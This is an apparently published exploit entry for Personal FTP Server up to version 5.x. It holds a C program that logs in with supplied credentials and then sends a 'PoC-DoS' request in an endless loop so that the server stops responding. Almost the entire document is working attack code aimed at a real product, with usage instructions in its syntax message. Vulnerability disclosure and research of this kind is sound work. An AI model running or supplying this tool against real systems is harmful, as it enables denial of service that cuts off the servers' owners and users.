Personal FTP Server versions up to 5.x resource exhaustion exploit that causes a denial of service condition.
0c65fc0aa8706908c4a6240e45258b66880ff7f512d1f3d4415f27e57ae121a1
/*
--------------------------------------------------------------------------------------
Denial of Service in Personal FTP Server up to 5.x (no crash)
Just the server is saturated, it stops responding.
The vulnerability is caused due to an error in handling the request (any request).
In PoC the request used is (PoC-DoS)
This can be exploited to satured the FTP service, and make the server inaccessible
for several days.
--------------------------------------------------------------------------------------
Author : Jonathan Salwan
Mail : submit AT shell-storm.org
Web : http://www.shell-storm.org
*/
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
int syntax(char *file)
{
fprintf(stderr,"Personal FTP Server Remote Denial of Service\n");
fprintf(stderr,"=>Syntax : <%s> <ip> <port> <user> <pass>\n",file);
fprintf(stderr," : %s 127.0.0.1 21 anonymous aaa\n",file);
exit(0);
}
int main(int argc, char **argv)
{
if (argc < 2)
syntax(argv[0]);
int port = atoi(argv[2]);
int mysocket;
int mysocket2;
int srv_connect;
int sockaddr_long;
struct sockaddr_in sockaddr_mysocket;
sockaddr_long = sizeof(sockaddr_mysocket);
sockaddr_mysocket.sin_family = AF_INET;
sockaddr_mysocket.sin_addr.s_addr = inet_addr(argv[1]);
sockaddr_mysocket.sin_port = htons(port);
char request[200];
char answer[500];
fprintf(stdout,"[+]Personal FTP Server %s\n",argv[1]);
mysocket2 = socket(AF_INET, SOCK_STREAM, 0);
if(mysocket2 == -1){
return 1;}
srv_connect = connect(mysocket2, (struct sockaddr*)&sockaddr_mysocket, sockaddr_long);
if (srv_connect != -1)
{
recv(mysocket2,answer,sizeof(answer),0);
fprintf(stdout,"[+]Connexion\t\t[OK]\n");
sprintf(request, "USER %s\r\n", argv[3]);
if (send(mysocket2,request,sizeof(request),0) == -1){
fprintf(stderr,"[-]Send Request User\t\t[FAILED]\n");
shutdown(mysocket2,1);
return 1;}
fprintf(stdout,"[+]USER request\t\t[OK]\n");
sprintf(request, "PASS %s\r\n", argv[4]);
if (send(mysocket2,request,sizeof(request),0) == -1){
fprintf(stderr,"[-]Send Request PASS\t\t[FAILED]\n");
shutdown(mysocket2,1);
return 1;}
fprintf(stdout,"[+]PASS request\t\t[OK]\n");
sprintf(request, "PoC-DoS\r\n");
fprintf(stdout,"[+]If exploit is active, the server is saturated, it stops responding...\n");
while(1){
if (send(mysocket2,request,sizeof(request),0) == -1){
fprintf(stderr,"[-]Send Request ABOR\t\t[FAILED]\n");
shutdown(mysocket2,1);
return 1;}
}
}
else{
fprintf(stderr,"[-]Connect\t\t[FAILED]\n");
shutdown(mysocket2,1);
return 1;}
shutdown(mysocket2,1);
return 0;
}